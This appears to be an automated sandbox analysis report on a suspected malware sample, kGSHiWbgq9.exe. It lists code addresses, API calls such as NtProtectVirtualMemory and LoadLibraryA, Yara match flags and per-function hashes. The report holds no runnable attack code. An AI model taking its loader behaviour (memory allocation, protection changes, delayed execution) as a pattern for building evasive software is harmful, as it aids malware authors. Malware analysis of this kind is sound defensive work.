0x0040115b
0x0040115d
0x0040115f
0x00401165
0x00401171
0x00401173
0x00401175
0x00401177
0x00401179
0x0040117b
0x0040117d
0x0040117f
0x00401183
0x00401186
0x00401188
0x0040118c
0x00401190
0x00401192
0x00401194
0x00401196
0x00401198
0x0040119e
0x004011a3
0x004011a9
0x004011ae
0x004011b0
0x004011b1
0x004011b4
0x004011bd
0x004011be
0x004011c0
0x004011c6
0x004011c7
0x004011cd
0x004011cf
0x004011d1
0x004011d3
0x004011d5
0x004011d7
0x004011d9
0x004011db
0x004011dd
0x004011df
0x004011e1
0x004011e3
0x004011e5
0x004011e7
0x004011e9
0x004011eb
0x004011ed
0x004011ef
0x004011f4
0x004011f6
0x004011f8
0x004011fa
0x004011fe
0x004011ff
0x00401201
0x00401202
0x00401203
0x00401209
0x0040120b
0x0040120d
0x0040120e
0x0040120f
0x00401210
0x00401211
0x00401213
0x00401214
0x00401216
0x00401217
0x00401219
0x0040121c
0x0040121e
0x00401221
0x00401227
0x00401228
0x0040122a
0x0040122c
0x0040122e
0x0040122f
0x00401231
0x00401233
0x00401235
0x00401237
0x0040123d
0x0040123f
0x00401241
0x00401243
0x00401245
0x00401247
0x0040124d
0x00401250
0x00401252
0x00401254
0x00401256
0x0040125d
0x0040125e
0x00401260
0x00401262
0x00401264
0x00401266
0x0040126a
0x0040126c
0x0040126d
0x00401272
0x00401274
0x00401276
0x0040127a
0x0040127c
0x00401280
0x00401282
0x00401284
0x00401286
0x00401288
0x0040128d
0x0040128e
0x00401290
0x00401292
0x00401294
0x00401296
0x00401298
0x00401299
0x0040129b
0x0040129d
0x0040129f
0x004012a1
0x004012a3
0x004012a5
0x004012a7
0x004012a9
0x004012ab
0x004012ad
0x004012af
0x004012b1
0x004012b3
0x004012b5
0x004012b7
0x004012c1
0x004012c2
0x004012c4
0x004012c6
0x004012c8
0x004012c9
0x004012ca
0x004012cb
0x004012cc
0x004012d1
0x00401328
0x00401328
0x00401328
0x0040132a
0x00000000
0x0040132c
0x0040132c
0x0040132d
0x0040132e
0x00000000
0x00401330
0x00401330
0x00401331
0x00000000
0x00401334
0x0040132e
0x004012d3
0x004012d3
0x004012d3
0x004012d4
0x00401326
0x00401326
0x00000000
0x004012d6
0x004012d6
0x00401327
0x00401327
0x00000000
0x004012d8
0x004012d8
0x004012dd
0x004012de
0x004012e0
0x0040135c
0x0040135c
0x0040135e
0x00000000
0x004012e2
0x004012e2
0x004012e2
0x004012e4
0x00401352
0x00401352
0x00401355
0x00401356
0x00401359
0x00000000
0x004012e6
0x004012e6
0x00401337
0x00401337
0x00401338
0x00401339
0x00000000
0x004012e8
0x004012e8
0x0040135f
0x0040135f
0x00401360
0x00000000
0x004012ea
0x004012ea
0x0040133b
0x0040133b
0x0040133c
0x0040133d
0x0040133e
0x00401341
0x00401343
0x00401343
0x00401344
0x00401345
0x00401347
0x00401348
0x00401348
0x00401349
0x00401349
0x0040134d
0x0040134f
0x00401350
0x00000000
0x00401350
0x00000000
0x004012ec
0x004012ec
0x004012ed
0x00000000
0x004012ef
0x004012ef
0x004012f0
0x004012f4
0x004012f9
0x0040136d
0x0040136d
0x00000000
0x00000000
0x00000000
0x00000000
0x004012fb
0x004012fc
0x00401300
0x00401301
0x00401302
0x00401304
0x00401306
0x00401308
0x0040130a
0x0040130c
0x0040130c
0x0040130e
0x00000000
0x00401310
0x00401310
0x00401312
0x00401363
0x00401364
0x00401365
0x00401368
0x0040136a
0x0040136a
0x0040136a
0x00000000
0x00401314
0x00401314
0x00401318
0x0040131b
0x0040131c
0x0040131e
0x0040136f
0x0040136f
0x00401370
0x0040139e
0x004013a0
0x004013a2
0x004013a5
0x004013ad
0x004013b1
0x004013b2
0x004013b7
0x004013b8
0x00401373
0x00401374
0x00401377
0x00401378
0x00401379
0x0040137b
0x0040137b
0x0040137c
0x0040137d
0x0040137f
0x0040137f
0x00401380
0x00401385
0x00401387
0x0040138e
0x00401391
0x00401394
0x00401395
0x00401397
0x00401398
0x00401399
0x0040139a
0x0040139c
0x0040139c
0x00000000
0x0040139c
0x00401385
0x00401320
0x00401320
0x00000000
0x00401325
0x0040131e
0x00401312
0x0040130e
0x004012f9
0x004012ed
0x004012ea
0x004012e8
0x004012e6
0x004012e4
0x004012e0
0x004012d6
0x004012d4
0x004013ba
0x004013bd
0x004013c4
0x004013c9
0x004013ca
0x004013cd
0x004013d2
0x004013e0
0x004013e6
0x004013e8
0x004013ec
0x004013ef
0x004013f7
0x00401405
0x00401408
0x00401409
0x0040140c
0x00401415
0x00401418
0x0040141c
0x00401422
0x00401427
0x00401428
0x0040142e
0x00401434
0x00401435
0x00401437
0x00401438
0x0040143a
0x0040148b
0x0040148c
0x0040148f
0x00401490
0x00401491
0x00401491
0x00401498
0x00401499
0x0040149b
0x00401477
0x00401478
0x0040147a
0x0040147f
0x00401480
0x00401482
0x00401485
0x00401488
0x0040148a
0x00000000
0x0040148a
0x0040143c
0x0040143e
0x00401440
0x00401443
0x00401444
0x00401446
0x0040144c
0x0040144d
0x00401451
0x00401455
0x00401456
0x0040145e
0x00401461
0x00401462
0x00401465
0x00401466
0x00000000
0x00401468
0x00401468
0x0040146f
0x00401470
0x00401474
0x00401476
0x00000000
0x00401476
0x004014b7
0x004014b7
0x004014b7
0x004014b8
0x004014ba
0x004014bd
0x004014be
0x004014bf
0x004014c0
0x004014c2
0x004014c6
0x004014c9
0x00000000
0x00000000
0x004014cb
0x004014cc
0x004014d1
0x004014b2
0x004014b5
0x00000000
0x004014b6
0x004014d4
0x004014d6
0x004014da
0x004014dc
0x004014dc
0x00000000

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401149

Strings

VB5!6&*, xrefs: 00401144

Memory Dump Source

Source File: 00000001.00000002.773246350.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.773233278.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.773277671.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.773282769.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: f7f0828d82d24344c24e667637b7ee2946cc307b89bd8ee84dc4efd9063d70f6
Instruction ID: 897156f5bccbea118947c71d059ed2fd519cf5942bc0f0e3fc105f14373928e3
Opcode Fuzzy Hash: f7f0828d82d24344c24e667637b7ee2946cc307b89bd8ee84dc4efd9063d70f6
Instruction Fuzzy Hash: 1A11CA5604F3C64FC30B8B718C656917FB0AE13659B0A02EBD9C2CE4E7D619099AC772

Uniqueness

Uniqueness Score: -1.00%

Function 020F5CBB, Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 020F5968: NtAllocateVirtualMemory.NTDLL(-00000001A3861579), ref: 020F5BA5

Part of subcall function 020F73C3: LoadLibraryA.KERNELBASE(?,47E8E701,?,020F06C1,00000000,020F0211), ref: 020F74B9

LdrInitializeThunk.NTDLL(00000000), ref: 020F65E4

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateInitializeLibraryLoadMemoryThunkVirtual
String ID:
API String ID: 2230336791-0
Opcode ID: 7466626f5064a3339faa456bc2aad76af3877b7938a29db41577922d944c89c6
Instruction ID: 27d25faa7ae59d512771195b00215646600cb64456c569af12cca7e835f3afd9
Opcode Fuzzy Hash: 7466626f5064a3339faa456bc2aad76af3877b7938a29db41577922d944c89c6
Instruction Fuzzy Hash: 7A3169715843889FCB61DF7488A47DD3BA7BF86340FA1411ECD895BA41DB304582DF52

Uniqueness

Uniqueness Score: -1.00%

Function 020F58FC, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 020F5968: NtAllocateVirtualMemory.NTDLL(-00000001A3861579), ref: 020F5BA5

LdrInitializeThunk.NTDLL(00000000), ref: 020F65E4

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateInitializeMemoryThunkVirtual
String ID:
API String ID: 3902809231-0
Opcode ID: 045f86c87c10f7fdd8b7cd7e959b724b9a96c696d324c9bde4e43982b42d7c7d
Instruction ID: b0e0f65be3a358cdcdbfdc76ae5466871eca8e378d6f341274b7c6ad0ea3dbc7
Opcode Fuzzy Hash: 045f86c87c10f7fdd8b7cd7e959b724b9a96c696d324c9bde4e43982b42d7c7d
Instruction Fuzzy Hash: 7F219C72488344CFCB959F308C983E93BE9AF12754FA04265CEA48A997D7338546EB90

Uniqueness

Uniqueness Score: -1.00%

Function 020F73C3, Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,47E8E701,?,020F06C1,00000000,020F0211), ref: 020F74B9

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d679913fd8f243486b86f6ba94ed7d7c88862db5923393d90c9c538254a0f390
Instruction ID: b4da70690d62498afb04524d18d97e523cbc14df3e8f1bfc9554de9b0eb2182f
Opcode Fuzzy Hash: d679913fd8f243486b86f6ba94ed7d7c88862db5923393d90c9c538254a0f390
Instruction Fuzzy Hash: E1214D70A813598BCFB1AE78D8947DE77A1AF58320F844026EE58EAA54C3309A419B56

Uniqueness

Uniqueness Score: -1.00%

Function 020F5CB3, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c64713e91398fdf48f61516a0fd41e7aa0aa9faa6d51be189b7b592f7c2a4ff0
Instruction ID: 213f121e29dc00b2908bd709520dfe26c55c906b67e5a1ab3ec23f9ded58a1cf
Opcode Fuzzy Hash: c64713e91398fdf48f61516a0fd41e7aa0aa9faa6d51be189b7b592f7c2a4ff0
Instruction Fuzzy Hash: 95D023B30D03005AC5C0777048595F527592F54110FF9C0C5D1456A84BCE1446D5F7F1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 020F7E5C, Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

HyuA, xrefs: 020F7EC6

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: HyuA
API String ID: 1029625771-2002190500
Opcode ID: 357ea02670d2617d2e23eff69a58288935f1764217c0474b24886776f9703e0e
Instruction ID: c7b3b1a7c9248d5d833b337ec6ab5d932176db67a44e967449d5f8afbe414ac2
Opcode Fuzzy Hash: 357ea02670d2617d2e23eff69a58288935f1764217c0474b24886776f9703e0e
Instruction Fuzzy Hash: 8081F572A443599BDBB5CE28C8957EB77A6BF88300F54812EDD0D9BB40D7309E40CB96

Uniqueness

Uniqueness Score: -1.00%

Function 020F3CF2, Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

@EAa, xrefs: 020F3E14

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: @EAa
API String ID: 0-534177664
Opcode ID: bebc784fe25d7a59788192a24dad418890df63f69fbf34c826860e3b20986b7c
Instruction ID: 38f0097534bfafdc0b29b6d873a7c06717886962d4f1dd03aebb1c9402bbb3a6
Opcode Fuzzy Hash: bebc784fe25d7a59788192a24dad418890df63f69fbf34c826860e3b20986b7c
Instruction Fuzzy Hash: 1151FEB1600388DFD7A4CF29D8987CABBA0FF1A360F148259D959CF261D7709A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 020F3CEF, Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

@EAa, xrefs: 020F3E14

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: @EAa
API String ID: 0-534177664
Opcode ID: f8dfa1c7380c3a607f374aafd8ec8a59c20149095fa84d831f405997bf456b30
Instruction ID: e4a18b1f465246624cc0f2e98cce5ed53d22b3625e66b9f80181bddb662aee0f
Opcode Fuzzy Hash: f8dfa1c7380c3a607f374aafd8ec8a59c20149095fa84d831f405997bf456b30
Instruction Fuzzy Hash: 4B41DDB56003889FDBB8CF28D9987CE7BA5FF09390F448119D849CB225D7709A80CF91

Uniqueness

Uniqueness Score: -1.00%

Function 020F2D3B, Relevance: .5, Instructions: 542COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3568c3b45448841e2bd9a4a130c370bbe1b9835c981409a4cc035b55c2e37678
Instruction ID: 73631fe231f2b69f400c03e61f12317734266e949d8c7f1443fe56a030581eb7
Opcode Fuzzy Hash: 3568c3b45448841e2bd9a4a130c370bbe1b9835c981409a4cc035b55c2e37678
Instruction Fuzzy Hash: B9228A716443899FDBA8CF28C880BDAB7E5FF49350F45422AED9DDB710D730AA508B91

Uniqueness

Uniqueness Score: -1.00%

Function 020F85E7, Relevance: .3, Instructions: 265libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,47E8E701,?,020F06C1,00000000,020F0211), ref: 020F74B9

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 32d42cda8d890c161df6133b8b63ac57525b88c41c7aff055999cf532d2ae868
Instruction ID: 7ebad4aca322584c099ff46522b216b279cada369e213db76c2eb29239e5eb0e
Opcode Fuzzy Hash: 32d42cda8d890c161df6133b8b63ac57525b88c41c7aff055999cf532d2ae868
Instruction Fuzzy Hash: 1CB1DF615483C58EDB66CF38C8987D67FE2AF13360F49C2AAC8998F6E6D3348505C716

Uniqueness

Uniqueness Score: -1.00%

Function 020F86DB, Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a9e8a19f72cd1f48c93bc0fe0b2c1c87dd375362c33e2adc05b6407b5a9028
Instruction ID: aa576f02dc131c7d53b0b982c32c58fb5bb93f188d2b757fda7847b226f469f2
Opcode Fuzzy Hash: 70a9e8a19f72cd1f48c93bc0fe0b2c1c87dd375362c33e2adc05b6407b5a9028
Instruction Fuzzy Hash: C191D1715483C58ADF76CF38C8987DA7BE2AF12350F49C2AACC898F696D3348145C712

Uniqueness

Uniqueness Score: -1.00%

Function 020F86F4, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d152c6b1d3714421e75616208b7cd777573d2a0128bdcbd6f84df866b441e9c3
Instruction ID: be81757c8d2516596a10e209ce99e288dc36b21e852b92b1f9f8968e32d37c48
Opcode Fuzzy Hash: d152c6b1d3714421e75616208b7cd777573d2a0128bdcbd6f84df866b441e9c3
Instruction Fuzzy Hash: 9F91F4725483C58ADF76CF38C8987DA7BE2AF12350F49C2AACC999F696D3348145C712

Uniqueness

Uniqueness Score: -1.00%

Function 020F2FD3, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d78ff428987fee85755337f898de08400f705c3150fc45985f007e99f860d8
Instruction ID: 2591cee9756d2521084bba32bea1370d933abe27f746f159dd1e6c7042415797
Opcode Fuzzy Hash: 69d78ff428987fee85755337f898de08400f705c3150fc45985f007e99f860d8
Instruction Fuzzy Hash: 6D819B7564438A9FDBA8CF28C980BDAB7E1FF08320F14422AED5CD7611D771AA10CB91

Uniqueness

Uniqueness Score: -1.00%

Function 020F8802, Relevance: .2, Instructions: 190libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,47E8E701,?,020F06C1,00000000,020F0211), ref: 020F74B9

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c54cc7a59c8ec043e5e694acadb6420223f3d26dc749ec3e5e451cdc85efd7ac
Instruction ID: f8069191900b9e16b87c5df0102c373d15c1d912043589d28fc2f37395e8cec3
Opcode Fuzzy Hash: c54cc7a59c8ec043e5e694acadb6420223f3d26dc749ec3e5e451cdc85efd7ac
Instruction Fuzzy Hash: 8981C5715483858BDF76CE38CC987DA7BE1AF12350F49C1AACC999F68AD3348505C716

Uniqueness

Uniqueness Score: -1.00%

Function 020F3441, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f44942bab911701621c5b2707fe8b231395bcd8d7302cea63d41ddbb78e1ed
Instruction ID: 8c4dc1caa947e06035b9577e3410ca51578e71ae9d754a5a955402ab791beaf3
Opcode Fuzzy Hash: 73f44942bab911701621c5b2707fe8b231395bcd8d7302cea63d41ddbb78e1ed
Instruction Fuzzy Hash: C1519D71A403989FDBA49F28CC40BEA77E6FF48360F45416AED99DB710D730AD458B84

Uniqueness

Uniqueness Score: -1.00%

Function 020F1DA0, Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20cd7f838c2c399771881acf17bb095032327195a07410a6ddac533b149d07e7
Instruction ID: 552a860c50aa2e2cba53889167ce4969535f8031acc165b45532e6b20f84d274
Opcode Fuzzy Hash: 20cd7f838c2c399771881acf17bb095032327195a07410a6ddac533b149d07e7
Instruction Fuzzy Hash: A051CA76A04298AFCB74CE29CC54BDE7BE6AF98340F46412AED4CEB610D7701E41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 020F1E99, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d903e196d1a77e06caa362852e834474d1722d8d3cf3bcd7d1eda1d757427391
Instruction ID: de315f26ca1755c2918993cf6c2df4a775805db583350db400aa04f1ddd4ee5d
Opcode Fuzzy Hash: d903e196d1a77e06caa362852e834474d1722d8d3cf3bcd7d1eda1d757427391
Instruction Fuzzy Hash: 1551FB76A04298AFCB74CE29CC14BDE7BE6AF98310F46412AED4CEB610D3701E45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 020F40B7, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1944b071c0b9ad6cb29e36e68911162b2672ce53d925434ae825b0b95ede70a
Instruction ID: fd2d63f08634be1456ac178f9b478145d0f5fa19b3d790b40d7f7b51d91c85e4
Opcode Fuzzy Hash: c1944b071c0b9ad6cb29e36e68911162b2672ce53d925434ae825b0b95ede70a
Instruction Fuzzy Hash: BF51D6366413448FD7B1CE6ACAE57DB77F3AFD8300F85812ACE494BA04C334A6059711

Uniqueness

Uniqueness Score: -1.00%

Function 020F2A77, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d92cf37e4b4cedc3369a403a8af7f8beef7af3960c28c153781cde82822bc7
Instruction ID: 71eb82cdcecc55ec1d855c5e3c3b5479fa4fd05e864f5d9a8d8422d46edb9d13
Opcode Fuzzy Hash: 95d92cf37e4b4cedc3369a403a8af7f8beef7af3960c28c153781cde82822bc7
Instruction Fuzzy Hash: 93416432508388AFEB758E359C557EEBBA5EFA5310F55001EED898B601C3305A81DB52

Uniqueness

Uniqueness Score: -1.00%

Function 020F891F, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6fb7e58d247ccaddce3f004ea839c770cbd46380bf4da2c5f9c979d04a7e12f1
Instruction ID: 79d5844e271990c3ec5a84f742dcbd3afd77a0033534c7a4d79d5ced213062de
Opcode Fuzzy Hash: 6fb7e58d247ccaddce3f004ea839c770cbd46380bf4da2c5f9c979d04a7e12f1
Instruction Fuzzy Hash: 1F51D572A483848BDFB9CF24C8983EB7BE1AF56350F49C1AACC899F649D3344545C726

Uniqueness

Uniqueness Score: -1.00%

Function 020F8C2C, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3979e021ec42b1eab24740f0a9b7472aaf688e5640a37c2dbd419da152df4932
Instruction ID: 77ac512fafe06daaa0ec1c40e5ed486fe5a6be6815a63772aa6220ed1c95f3ba
Opcode Fuzzy Hash: 3979e021ec42b1eab24740f0a9b7472aaf688e5640a37c2dbd419da152df4932
Instruction Fuzzy Hash: 00419B329453848FDFB68E3489A93EB7BE2AF43340F05C12ECD868BA45D3704646C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 020F398F, Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e708eb3ba3961d39b75b35530be9f86c586dae79ecf33cdcd7f9c8c149c6842
Instruction ID: 7f9206e1f6792032deb303a5eec5ea8086fdcd248d428550a502040776526507
Opcode Fuzzy Hash: 8e708eb3ba3961d39b75b35530be9f86c586dae79ecf33cdcd7f9c8c149c6842
Instruction Fuzzy Hash: A6411370548788DFEBB5AF75CD84BEEB7E2FF45310F514159CA898A561C3304A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F3ACE, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9220530af5c7b9e5b3fef6c9c8d40c913d72ee250cb2241795135e2c11d8748
Instruction ID: 029b70fa7acdb38f03712f71a05aeb9f71b6aefcdc0fca45b48e8a03f77c8f50
Opcode Fuzzy Hash: c9220530af5c7b9e5b3fef6c9c8d40c913d72ee250cb2241795135e2c11d8748
Instruction Fuzzy Hash: 5031DC70648B88DFEBB4AF35CD85BEEB7E2FF45304F518119CA899A561C3304A81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 020F4339, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e164ed57c3a3467471cb07b325d6d9deadb749a7e2ffbcf7627c77b8cd98c899
Instruction ID: 5b8495046e095175d4952dba902fd727a7e0c21e28c314a2f462d411cb2f642f
Opcode Fuzzy Hash: e164ed57c3a3467471cb07b325d6d9deadb749a7e2ffbcf7627c77b8cd98c899
Instruction Fuzzy Hash: 0001AD3A8093109FC74C6E708916AAABBE1BF12344F87481DDDC2A2820C33069C5CF43

Uniqueness

Uniqueness Score: -1.00%

Function 020F7898, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddaf7c65e72ce01bd5ce92f6025a78758458cf09adf806ed9f545b7f8277c1d1
Instruction ID: f6071dae62709998ae1187ac4a0873133c9e406ee5abdee83b1a5e81d5c4a110
Opcode Fuzzy Hash: ddaf7c65e72ce01bd5ce92f6025a78758458cf09adf806ed9f545b7f8277c1d1
Instruction Fuzzy Hash: C601E8B5A813949FDBB1CF18C8C4BD9B3E1BB5C710F458466EA199B721D3309A00DB15

Uniqueness

Uniqueness Score: -1.00%

Function 020F5589, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d623111d86762eb24377d814acc21f671ddf9c63aa473290ef7768a21f1cdae2
Instruction ID: c3c0329933c535c8ab8d9fbdceddaae54231673f2d0a871587ee904072db9e9d
Opcode Fuzzy Hash: d623111d86762eb24377d814acc21f671ddf9c63aa473290ef7768a21f1cdae2
Instruction Fuzzy Hash: 4CC092FA2026C09FFF0ADB08C491B4073A0FB44B88B0804D0E402CFB12C324E900CA08

Uniqueness

Uniqueness Score: -1.00%

Function 020F73B4, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kGSHiWbgq9.exe PID: 6636 Parent PID: 6592 kGSHiWbgq9.exeCOMMON

Executed Functions

Function 00569C03, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?), ref: 00569C26

Strings

vq, xrefs: 00569C56

Memory Dump Source

Source File: 0000000B.00000002.1726383083.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: Sleep
String ID: vq
API String ID: 3472027048-1299568716
Opcode ID: 61f272a1f26801941bd996d2f46024b5c27781f8cda5297ea4954dcf66e6a2d9
Instruction ID: bc03832b6914c9c21d4ef45d7ee39d8036ba7d2aad35ac8060e9b17e4f663e3c
Opcode Fuzzy Hash: 61f272a1f26801941bd996d2f46024b5c27781f8cda5297ea4954dcf66e6a2d9
Instruction Fuzzy Hash: 420169B05057419FE745AF21C98DB59BBE9BF043A6F228188E9115B1B2C3B8C980CF22

Uniqueness

Uniqueness Score: -1.00%

Function 00569C2B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00569C64

Strings

vq, xrefs: 00569C56

Memory Dump Source

Source File: 0000000B.00000002.1726383083.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID: vq
API String ID: 2706961497-1299568716
Opcode ID: fd47f9c841b85e59659f5dbe6beaed77a3dd4cb0efe31081ce15412bc3eb40e0
Instruction ID: a18b364b0b2010e60ddcc4174c2ab4d60513536fadca67eaa7872e4ba8ccbb26
Opcode Fuzzy Hash: fd47f9c841b85e59659f5dbe6beaed77a3dd4cb0efe31081ce15412bc3eb40e0
Instruction Fuzzy Hash: 7EE039B18017449FE7459E36C80DB6ABBA8BF103A5F218188A4618B0B5C2F889808F62

Uniqueness

Uniqueness Score: -1.00%

Function 00569B39, Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00569BB4

Memory Dump Source

Source File: 0000000B.00000002.1726383083.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 0e15e392d696656e7d89b817859a1c953d239c8a831175081876f6f9791be93e
Instruction ID: ee70f9e2dd6714d754b2e09618058bcfba385ee26d569250164025edda54d993
